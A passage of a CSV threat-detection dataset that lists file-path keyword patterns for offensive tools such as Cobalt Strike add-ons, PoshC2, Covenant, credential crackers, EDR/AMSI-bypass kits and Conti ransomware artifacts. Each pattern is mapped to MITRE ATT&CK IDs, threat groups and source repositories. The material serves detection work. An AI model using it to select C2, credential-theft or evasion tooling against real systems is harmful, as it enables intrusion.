T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*/onedrive_user_enum*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*/oneliner.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/oneliner2.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/onesixtyone/dict.txt*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,1,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*/onex.git*,offensive_tool_keyword,onex,Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/onex,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/open_vas.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/openbullet.git*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*/OpenBullet2.git*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*/openflow-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/openlookup-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/openvas-otp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/openwebnet-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/opt/.exegol_aliases*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/opt/chimera*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/opt/cobaltstrike/logs*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/opt/Covenant/Covenant/*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/opt/gocrack/files/engine*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/opt/gocrack/files/task*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/opt/icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/opt/implant/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/opt/lwp-scripts*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/opt/lwp-wordlists*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/opt/merlin/*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*/opt/nessus/*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/opt/Ninja/*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/opt/Password_Cracking/*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/opt/PoshC2*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/opt/rai/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/opt/seclists/Discovery/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/optiv/Dent/*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,1,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/optiv/Freeze/*,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,1,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*/oracle-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/oracle-brute-stealth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/oracle-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/oracle-sid-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/oracle-tns-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/orbitaldump.git*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,1,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*/oscp.profile*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*/osmedeus*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/out:spacerunner.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,1,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*/outfile:C:\ProgramData\hashes.txt*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/outflank_bofs/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/outflanknl/*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*/output/payloads/*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/output/ratchatPT*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ovs-agent-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/OWASP*,offensive_tool_keyword,OWASP,resources and cheat sheet for web attacks techniques,T1190 - T1191 - T1192 - T1210 - T1590 - T1558,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011,N/A,N/A,Web Attacks,https://github.com/OWASP,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/p_cve-2014-9322.tar.gz*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/p292/Phant0m*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*/p2p-conficker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/package/portscan/*.go,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 